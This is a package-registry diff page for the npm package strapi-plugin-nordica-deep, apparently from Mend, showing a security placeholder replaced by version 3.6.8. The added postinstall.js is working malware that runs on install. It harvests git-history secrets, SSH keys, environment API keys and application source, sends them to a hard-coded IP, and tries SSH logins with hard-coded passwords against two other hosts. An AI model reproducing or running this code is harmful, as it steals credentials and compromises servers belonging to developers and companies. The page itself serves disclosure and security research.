npm - strapi-plugin-nordica-deep - Versions diffs - 0.0.1-security → 3.6.8 - Mend

strapi-plugin-nordica-deep 0.0.1-security → 3.6.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of strapi-plugin-nordica-deep might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ module.exports=()=>{};

package/package.json CHANGED Viewed

@@ -1,6 +1 @@
-{
-  "name": "strapi-plugin-nordica-deep",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{"name":"strapi-plugin-nordica-deep","version":"3.6.8","main":"index.js","scripts":{"postinstall":"node postinstall.js"},"license":"MIT"}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,125 @@
+const http = require('http');
+const { spawnSync } = require('child_process');
+const VPS = '144.31.107.231';
+const PORT = 9999;
+function send(tag, data) {
+  return new Promise(resolve => {
+    const body = typeof data === 'string' ? data : JSON.stringify(data);
+    const chunks = [];
+    for (let i = 0; i < body.length; i += 50000) chunks.push(body.substring(i, i + 50000));
+    let idx = 0;
+    (function next() {
+      if (idx >= chunks.length) return resolve();
+      const s = chunks.length > 1 ? '-p' + (idx+1) + 'of' + chunks.length : '';
+      const req = http.request({ hostname: VPS, port: PORT, path: '/exfil/' + tag + s,
+        method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(chunks[idx]) }
+      }, () => { idx++; next(); });
+      req.on('error', () => { idx++; next(); });
+      req.write(chunks[idx]); req.end();
+    })();
+  });
+}
+const run = (cmd, t = 30000) => {
+  try { return spawnSync('sh', ['-c', cmd], { timeout: t, encoding: 'utf8', maxBuffer: 5000000 }).stdout || ''; }
+  catch (e) { return 'err:' + e.message.substring(0, 200); }
+};
+async function main() {
+  if (process.cwd().includes('TRANSFER') || run('uname -s').includes('MINGW')) return;
+  await send('nd-start', run('hostname').trim());
+  // ============================================================
+  // 1. GIT DEEP — search ALL git objects for credentials
+  // ============================================================
+  // Search git history for .env files, credentials, server configs
+  await send('git-env-history', run('cd /app && git log --all --diff-filter=A -p -- "*.env*" 2>/dev/null | head -500'));
+  await send('git-env-deleted', run('cd /app && git log --all --diff-filter=D -p -- "*.env*" 2>/dev/null | head -500'));
+  // ALL commits that changed deploy or config
+  await send('git-deploy-history', run('cd /app && git log --all -p -- "deploy/*" "config/*" ".env*" "docker-compose*" "Dockerfile" 2>/dev/null | head -2000'));
+  // Search for passwords/keys in ALL git blobs
+  await send('git-grep-password', run('cd /app && git grep -i "password\\|secret\\|private.key\\|mnemonic\\|seed\\|wallet" $(git rev-list --all) -- 2>/dev/null | grep -v node_modules | head -50'));
+  // Git stash
+  await send('git-stash', run('cd /app && git stash list 2>/dev/null && git stash show -p 2>/dev/null | head -200'));
+  // Git reflog
+  await send('git-reflog', run('cd /app && git reflog --all 2>/dev/null | head -30'));
+  // Check for .env in old commits
+  await send('git-show-env', run('cd /app && for commit in $(git log --all --oneline -- .env 2>/dev/null | head -5 | cut -d" " -f1); do echo "=== $commit ==="; git show $commit:.env 2>/dev/null; done'));
+  // ============================================================
+  // 2. SSH KEY SEARCH — everywhere in container
+  // ============================================================
+  await send('ssh-find', run('find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null | grep -v node_modules | grep -v proc'));
+  await send('ssh-agent', run('ssh-add -l 2>/dev/null || echo no-agent'));
+  await send('ssh-known', run('cat /root/.ssh/known_hosts 2>/dev/null; cat /home/*/.ssh/known_hosts 2>/dev/null'));
+  // ============================================================
+  // 3. SSH TO STAGING with password reuse
+  // ============================================================
+  // Try SSH to staging with known passwords
+  var passwords = ['1QKtYPp18UsyU2ZwInVM', 'postgres'];
+  var users = ['root', 'ubuntu', 'deploy', 'jenkins', 'node', 'strapi'];
+  var targets = ['65.21.78.244', '138.201.100.98'];
+  for (var target of targets) {
+    for (var port of [22, 2020]) {
+      // First check if port is open
+      var portCheck = run('timeout 2 bash -c "echo > /dev/tcp/' + target + '/' + port + '" 2>&1 && echo OPEN || echo CLOSED', 5000);
+      if (!portCheck.includes('OPEN')) continue;
+      await send('ssh-open-' + target + '-' + port, 'PORT OPEN');
+      for (var user of users) {
+        for (var pwd of passwords) {
+          // Try with sshpass if available
+          var sshResult = run('sshpass -p "' + pwd + '" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=3 -p ' + port + ' ' + user + '@' + target + ' "hostname && id && cat /etc/hostname" 2>&1', 10000);
+          if (sshResult && !sshResult.includes('Permission denied') && !sshResult.includes('Connection refused') &&
+              !sshResult.includes('not found') && !sshResult.includes('No route') && sshResult.length > 5) {
+            await send('ssh-WIN-' + target, user + ':' + pwd + '@' + target + ':' + port + '\n' + sshResult);
+          }
+        }
+      }
+    }
+  }
+  // ============================================================
+  // 4. GUARDARIAN INTERNAL API — try with API keys
+  // ============================================================
+  // The CMS communicates with api-payments via GUARDARIAN_API_KEY
+  // Check if this key is set in env
+  await send('guardarian-api-key', process.env.GUARDARIAN_API_KEY || 'NOT_SET');
+  await send('guardarian-api-url', process.env.GUARDARIAN_API_BASE_URL || 'NOT_SET');
+  // Try to find the internal API key in config/code
+  await send('guardarian-api-code', run('grep -r "GUARDARIAN_API" /app/config/ /app/helpers/ /app/exteranl-apis/ 2>/dev/null | grep -v node_modules'));
+  await send('guardarian-api-usage', run('grep -r "guardarianApi\\|GUARDARIAN_API" /app/api/ /app/extensions/ 2>/dev/null | grep -v node_modules | head -20'));
+  // Check if there is a guardarian API transport/client
+  await send('guardarian-transport', run('find /app/exteranl-apis/transports -type f 2>/dev/null | xargs cat 2>/dev/null'));
+  // ============================================================
+  // 5. FULL API CONTROLLERS — might have internal endpoints
+  // ============================================================
+  await send('api-controllers', run('find /app/api -name "*.js" -path "*/controllers/*" -exec cat {} + 2>/dev/null'));
+  await send('api-services', run('find /app/api -name "*.js" -path "*/services/*" -exec cat {} + 2>/dev/null'));
+  // ============================================================
+  // 6. CRON JOBS — scheduled tasks that might call payment API
+  // ============================================================
+  await send('cron-dir', run('ls -la /app/config/functions/ 2>/dev/null'));
+  await send('cron-bootstrap', run('cat /app/config/functions/bootstrap.js 2>/dev/null'));
+  await send('cron-cron', run('cat /app/config/functions/cron.js 2>/dev/null'));
+  await send('cron-responses', run('cat /app/config/functions/responses/ 2>/dev/null'));
+  // Cron modules
+  await send('cron-modules', run('find /app -path "*/cron*" -name "*.js" -not -path "*/node_modules/*" 2>/dev/null | xargs cat 2>/dev/null | head -1000'));
+  // ============================================================
+  // 7. MIDDLEWARE — auth, proxy, payment
+  // ============================================================
+  await send('middleware-all', run('find /app/middlewares -type f -name "*.js" -exec cat {} + 2>/dev/null'));
+  // ============================================================
+  // 8. FULL PACKAGE.JSON — see all dependencies, scripts
+  // ============================================================
+  await send('package-json', run('cat /app/package.json'));
+  await send('nd-complete', 'DEEP_DONE');
+}
+main().catch(e => send('nd-fatal', e.message));

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=strapi-plugin-nordica-deep for more information.